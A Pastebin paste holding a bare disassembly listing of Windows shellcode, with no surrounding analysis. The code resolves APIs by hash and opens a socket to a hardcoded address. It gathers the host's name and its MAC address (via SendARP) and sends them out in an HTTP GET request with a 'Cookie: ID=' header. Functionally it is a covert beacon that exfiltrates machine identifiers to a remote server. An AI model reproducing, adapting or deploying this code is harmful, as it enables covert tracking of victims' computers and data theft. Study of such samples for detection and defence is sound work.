Pastebin.com - Printed Paste ID: https://pastebin.com/

1. seg000:00000000 ; Segment type: Pure code
2. seg000:00000000 seg000 segment byte public 'CODE' use32
3. seg000:00000000 assume cs:seg000
4. seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
5. seg000:00000000 pusha
6. seg000:00000001 cld
7. seg000:00000002 call sub_91
8. seg000:00000007 pusha
9. seg000:00000008 mov ebp, esp
10. seg000:0000000A xor edx, edx
11. seg000:0000000C mov edx, fs:[edx+30h]
12. seg000:00000010 mov edx, [edx+0Ch]
13. seg000:00000013 mov edx, [edx+14h]
14. seg000:00000016
15. seg000:00000016 loc_16: ; CODE XREF: seg000:0000008Ej
16. seg000:00000016 mov esi, [edx+28h]
17. seg000:00000019 movzx ecx, word ptr [edx+26h]
18. seg000:0000001D xor edi, edi
19. seg000:0000001F
20. seg000:0000001F loc_1F: ; CODE XREF: seg000:0000002Dj
21. seg000:0000001F xor eax, eax
22. seg000:00000021 lodsb
23. seg000:00000022 cmp al, 61h ; 'a'
24. seg000:00000024 jl short loc_28
25. seg000:00000026 sub al, 20h ; ' '
26. seg000:00000028
27. seg000:00000028 loc_28: ; CODE XREF: seg000:00000024j
28. seg000:00000028 ror edi, 0Dh
29. seg000:0000002B add edi, eax
30. seg000:0000002D loop loc_1F
31. seg000:0000002F push edx
32. seg000:00000030 push edi
33. seg000:00000031 mov edx, [edx+10h]
34. seg000:00000034 mov eax, [edx+3Ch]
35. seg000:00000037 add eax, edx
36. seg000:00000039 mov eax, [eax+78h]
37. seg000:0000003C test eax, eax
38. seg000:0000003E jz short loc_8A
39. seg000:00000040 add eax, edx
40. seg000:00000042 push eax
41. seg000:00000043 mov ecx, [eax+18h]
42. seg000:00000046 mov ebx, [eax+20h]
43. seg000:00000049 add ebx, edx
44. seg000:0000004B
45. seg000:0000004B loc_4B: ; CODE XREF: seg000:00000067j
46. seg000:0000004B jecxz short loc_89
47. seg000:0000004D dec ecx
48. seg000:0000004E mov esi, [ebx+ecx*4]
49. seg000:00000051 add esi, edx
50. seg000:00000053 xor edi, edi
51. seg000:00000055
52. seg000:00000055 loc_55: ; CODE XREF: seg000:0000005Fj
53. seg000:00000055 xor eax, eax
54. seg000:00000057 lodsb
55. seg000:00000058 ror edi, 0Dh
56. seg000:0000005B add edi, eax
57. seg000:0000005D cmp al, ah
58. seg000:0000005F jnz short loc_55
59. seg000:00000061 add edi, [ebp-8]
60. seg000:00000064 cmp edi, [ebp+24h]
61. seg000:00000067 jnz short loc_4B
62. seg000:00000069 pop eax
63. seg000:0000006A mov ebx, [eax+24h]
64. seg000:0000006D add ebx, edx
65. seg000:0000006F mov cx, [ebx+ecx*2]
66. seg000:00000073 mov ebx, [eax+1Ch]
67. seg000:00000076 add ebx, edx
68. seg000:00000078 mov eax, [ebx+ecx*4]
69. seg000:0000007B add eax, edx
70. seg000:0000007D mov [esp+24h], eax
71. seg000:00000081 pop ebx
72. seg000:00000082 pop ebx
73. seg000:00000083 popa
74. seg000:00000084 pop ecx
75. seg000:00000085 pop edx
76. seg000:00000086 push ecx
77. seg000:00000087 jmp eax
78. seg000:00000089 ; ---------------------------------------------------------------------------
79. seg000:00000089
80. seg000:00000089 loc_89: ; CODE XREF: seg000:loc_4Bj
81. seg000:00000089 pop eax
82. seg000:0000008A
83. seg000:0000008A loc_8A: ; CODE XREF: seg000:0000003Ej
84. seg000:0000008A pop edi
85. seg000:0000008B pop edx
86. seg000:0000008C mov edx, [edx]
87. seg000:0000008E jmp short loc_16
88. seg000:0000008E ; ---------------------------------------------------------------------------
89. seg000:00000090 dbCnt db 5
90. seg000:00000091
91. seg000:00000091 ; =============== S U B R O U T I N E =======================================
92. seg000:00000091
93. seg000:00000091
94. seg000:00000091 sub_91 proc near ; CODE XREF: seg000:00000002p
95. seg000:00000091 pop ebp
96. seg000:00000092 cmp dword ptr [ebp+2E9h], 20544547h
97. seg000:0000009C jnz short loc_10E
98. seg000:0000009E lea eax, [ebp+2D1h] ; 0x2d8, ws2_32
99. seg000:000000A4 push eax
100. seg000:000000A5 push 726774Ch ; LoadLibraryA_salt
101. seg000:000000AA call ebp
102. seg000:000000AC test eax, eax
103. seg000:000000AE jz short loc_10E
104. seg000:000000B0 lea eax, [ebp+2D8h] ; 0x2df,IPHLPAPI
105. seg000:000000B6 push eax
106. seg000:000000B7 push 726774Ch ; LoadLibraryA_salt
107. seg000:000000BC call ebp
108. seg000:000000BE test eax, eax
109. seg000:000000C0 jz short loc_10E
110. seg000:000000C2 mov ebx, 190h
111. seg000:000000C7 sub esp, ebx
112. seg000:000000C9 push esp
113. seg000:000000CA push ebx
114. seg000:000000CB push 6B8029h ; WSAStartup_salt
115. seg000:000000D0 call ebp
116. seg000:000000D2 add esp, ebx
117. seg000:000000D4 test eax, eax
118. seg000:000000D6 jnz short loc_10E
119. seg000:000000D8 push eax
120. seg000:000000D9 push eax
121. seg000:000000DA push eax
122. seg000:000000DB push eax
123. seg000:000000DC inc eax
124. seg000:000000DD push eax
125. seg000:000000DE inc eax
126. seg000:000000DF push eax
127. seg000:000000E0 push 0E0DF0FEAh ; WSASocketA_salt
128. seg000:000000E5 call ebp
129. seg000:000000E7 xor ebx, ebx
130. seg000:000000E9 not ebx
131. seg000:000000EB cmp ebx, eax
132. seg000:000000ED jz short loc_10E
133. seg000:000000EF mov ebx, eax
134. seg000:000000F1
135. seg000:000000F1 loc_F1: ; CODE XREF: sub_91+7Bj
136. seg000:000000F1 push 10h
137. seg000:000000F3 lea esi, [ebp+2E1h]
138. seg000:000000F9 push esi
139. seg000:000000FA push ebx
140. seg000:000000FB push 6174A599h ; connect_salt
141. seg000:00000100 call ebp
142. seg000:00000102 test eax, eax
143. seg000:00000104 jz short loc_125
144. seg000:00000106 dec byte ptr [ebp+89h] ; dbCnt
145. seg000:0000010C jnz short loc_F1
146. seg000:0000010E
147. seg000:0000010E loc_10E: ; CODE XREF: sub_91+Bj
148. seg000:0000010E ; sub_91+1Dj ...
149. seg000:0000010E cmp byte ptr [ebp+24Fh], 1
150. seg000:00000115 jz short loc_11E
151. seg000:00000117 call sub_257
152. seg000:0000011C jmp short loc_123
153. seg000:0000011E ; ---------------------------------------------------------------------------
154. seg000:0000011E
155. seg000:0000011E loc_11E: ; CODE XREF: sub_91+84j
156. seg000:0000011E call sub_270
157. seg000:00000123
158. seg000:00000123 loc_123: ; CODE XREF: sub_91+8Bj
159. seg000:00000123 jmp edi
160. seg000:00000125 ; ---------------------------------------------------------------------------
161. seg000:00000125
162. seg000:00000125 loc_125: ; CODE XREF: sub_91+73j
163. seg000:00000125 mov eax, 100h
164. seg000:0000012A sub esp, eax
165. seg000:0000012C mov edx, esp
166. seg000:0000012E push edx
167. seg000:0000012F push eax
168. seg000:00000130 push edx
169. seg000:00000131 push 1DE49B6h ; gethostname_salt
170. seg000:00000136 call ebp
171. seg000:00000138 pop edi
172. seg000:00000139 add esp, 100h
173. seg000:0000013F test eax, eax
174. seg000:00000141 jnz loc_239
175. seg000:00000147 push edi
176. seg000:00000148 call sub_246
177. seg000:0000014D pop esi
178. seg000:0000014E mov edx, ecx
179. seg000:00000150 lea edi, [ebp+2E9h]
180. seg000:00000156 call sub_246
181. seg000:0000015B dec edi
182. seg000:0000015C cmp edx, 20h ; ' '
183. seg000:0000015F jl short loc_166
184. seg000:00000161 mov edx, 20h ; ' '
185. seg000:00000166
186. seg000:00000166 loc_166: ; CODE XREF: sub_91+CEj
187. seg000:00000166 mov ecx, edx
188. seg000:00000168 push esi
189. seg000:00000169 rep movsb
190. seg000:0000016B mov ecx, 0Dh
191. seg000:00000170 lea esi, [ebp+2C4h]
192. seg000:00000176 rep movsb
193. seg000:00000178 mov [ebp+24Bh], edi
194. seg000:0000017E pop esi
195. seg000:0000017F push esi
196. seg000:00000180 push 803428A9h ; gethostbyname_salt
197. seg000:00000185 call ebp
198. seg000:00000187 test eax, eax
199. seg000:00000189 jz loc_239
200. seg000:0000018F mov cx, [eax+0Ah]
201. seg000:00000193 cmp cx, 4
202. seg000:00000197 jb loc_239
203. seg000:0000019D lea eax, [eax+0Ch]
204. seg000:000001A0 mov eax, [eax]
205. seg000:000001A2 mov ecx, [eax]
206. seg000:000001A4 mov ecx, [ecx]
207. seg000:000001A6 mov eax, 100h
208. seg000:000001AB push eax
209. seg000:000001AC mov edi, esp
210. seg000:000001AE sub esp, eax
211. seg000:000001B0 mov esi, esp
212. seg000:000001B2 push edi
213. seg000:000001B3 push esi
214. seg000:000001B4 push ecx
215. seg000:000001B5 push ecx
216. seg000:000001B6 push 0B8D27248h ; SendARP_salt
217. seg000:000001BB call ebp
218. seg000:000001BD test eax, eax
219. seg000:000001BF add esp, 104h
220. seg000:000001C5 movzx ecx, word ptr [edi]
221. seg000:000001C8 cmp ecx, 6
222. seg000:000001CB jb short loc_239
223. seg000:000001CD mov ecx, 6
224. seg000:000001D2 mov eax, 10h
225. seg000:000001D7 sub esp, eax
226. seg000:000001D9 mov edi, esp
227. seg000:000001DB mov edx, ecx
228. seg000:000001DD shl edx, 1
229. seg000:000001DF push eax
230. seg000:000001E0 push edx
231. seg000:000001E1
232. seg000:000001E1 loc_1E1: ; CODE XREF: sub_91+17Aj
233. seg000:000001E1 xor edx, edx
234. seg000:000001E3 mov dl, [esi]
235. seg000:000001E5 mov al, dl
236. seg000:000001E7 and al, 0F0h
237. seg000:000001E9 shr al, 4
238. seg000:000001EC cmp al, 9
239. seg000:000001EE ja short loc_1F4
240. seg000:000001F0 add al, 30h ; '0'
241. seg000:000001F2 jmp short loc_1F6
242. seg000:000001F4 ; ---------------------------------------------------------------------------
243. seg000:000001F4
244. seg000:000001F4 loc_1F4: ; CODE XREF: sub_91+15Dj
245. seg000:000001F4 add al, 37h ; '7'
246. seg000:000001F6
247. seg000:000001F6 loc_1F6: ; CODE XREF: sub_91+161j
248. seg000:000001F6 mov [edi], al
249. seg000:000001F8 inc edi
250. seg000:000001F9 mov al, dl
251. seg000:000001FB and al, 0Fh
252. seg000:000001FD cmp al, 9
253. seg000:000001FF ja short loc_205
254. seg000:00000201 add al, 30h ; '0'
255. seg000:00000203 jmp short loc_207
256. seg000:00000205 ; ---------------------------------------------------------------------------
257. seg000:00000205
258. seg000:00000205 loc_205: ; CODE XREF: sub_91+16Ej
259. seg000:00000205 add al, 37h ; '7'
260. seg000:00000207
261. seg000:00000207 loc_207: ; CODE XREF: sub_91+172j
262. seg000:00000207 mov [edi], al
263. seg000:00000209 inc edi
264. seg000:0000020A inc esi
265. seg000:0000020B loop loc_1E1
266. seg000:0000020D pop ecx
267. seg000:0000020E sub edi, ecx
268. seg000:00000210 mov esi, edi
269. seg000:00000212 pop eax
270. seg000:00000213 add esp, eax
271. seg000:00000215 mov edi, [ebp+24Bh]
272. seg000:0000021B rep movsb
273. seg000:0000021D mov byte ptr [ebp+24Fh], 1
274. seg000:00000224 call sub_257
275. seg000:00000229 xor eax, eax
276. seg000:0000022B push eax
277. seg000:0000022C push ecx
278. seg000:0000022D sub edi, ecx
279. seg000:0000022F dec edi
280. seg000:00000230 push edi
281. seg000:00000231 push ebx
282. seg000:00000232 push 5F38EBC2h ; send_salt
283. seg000:00000237 call ebp
284. seg000:00000239
285. seg000:00000239 loc_239: ; CODE XREF: sub_91+B0j
286. seg000:00000239 ; sub_91+F8j ...
287. seg000:00000239 push ebx
288. seg000:0000023A push 614D6E75h ; closesocket_salt
289. seg000:0000023F call ebp
290. seg000:00000241 jmp loc_10E
291. seg000:00000241 sub_91 endp ; sp-analysis failed
292. seg000:00000241
293. seg000:00000246
294. seg000:00000246 ; =============== S U B R O U T I N E =======================================
295. seg000:00000246
296. seg000:00000246
297. seg000:00000246 sub_246 proc near ; CODE XREF: sub_91+B7p
298. seg000:00000246 ; sub_91+C5p ...
299. seg000:00000246 xor ecx, ecx
300. seg000:00000248 not ecx
301. seg000:0000024A xor eax, eax
302. seg000:0000024C repne scasb
303. seg000:0000024E not ecx
304. seg000:00000250 dec ecx
305. seg000:00000251 retn
306. seg000:00000251 sub_246 endp
307. seg000:00000251
308. seg000:00000251 ; ---------------------------------------------------------------------------
309. seg000:00000252 db 0
310. seg000:00000253 db 0
311. seg000:00000254 db 0
312. seg000:00000255 db 0
313. seg000:00000256 db 0
314. seg000:00000257
315. seg000:00000257 ; =============== S U B R O U T I N E =======================================
316. seg000:00000257
317. seg000:00000257
318. seg000:00000257 sub_257 proc near ; CODE XREF: sub_91+86p
319. seg000:00000257 ; sub_91+193p
320. seg000:00000257 lea edi, [ebp+2E9h]
321. seg000:0000025D call sub_246
322. seg000:00000262 dec edi
323. seg000:00000263 mov ecx, 4Fh ; 'O'
324. seg000:00000268 lea esi, [ebp+275h]
325. seg000:0000026E rep movsb
326. seg000:0000026E sub_257 endp ; sp-analysis failed
327. seg000:0000026E
328. seg000:00000270
329. seg000:00000270 ; =============== S U B R O U T I N E =======================================
330. seg000:00000270
331. seg000:00000270
332. seg000:00000270 sub_270 proc near ; CODE XREF: sub_91:loc_11Ep
333. seg000:00000270 lea edi, [ebp+2E9h]
334. seg000:00000276 call sub_246
335. seg000:0000027B retn
336. seg000:0000027B sub_270 endp
337. seg000:0000027B
338. seg000:0000027B ; ---------------------------------------------------------------------------
339. seg000:0000027C aConnectionKeep db 0Dh,0Ah
340. seg000:0000027C db 'Connection: keep-alive',0Dh,0Ah
341. seg000:0000027C db 'Accept: */*',0Dh,0Ah
342. seg000:0000027C db 'Accept-Encoding: gzip',0Dh,0Ah
343. seg000:0000027C db 0Dh,0Ah,0
344. seg000:000002BD ; ---------------------------------------------------------------------------
345. seg000:000002BD add edi, 0Eh
346. seg000:000002C0 xor ecx, ecx
347. seg000:000002C2 not ecx
348. seg000:000002C4 xor eax, eax
349. seg000:000002C6 repe scasb
350. seg000:000002C8 dec edi
351. seg000:000002C9 jmp edi
352. seg000:000002C9 ; ---------------------------------------------------------------------------
353. seg000:000002CB aCookieId db 0Dh,0Ah
354. seg000:000002CB db 'Cookie: ID='
355. seg000:000002D8 aWs2_32 db 'ws2_32',0
356. seg000:000002DF aIphlpapi db 'IPHLPAPI',0
357. seg000:000002E8 dd 50000002h
358. seg000:000002EC dd 36CADE41h
359. seg000:000002F0 aGet05cea4de951 db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah
360. seg000:000002F0 db 'Host: ',0
361. seg000:0000032B db 0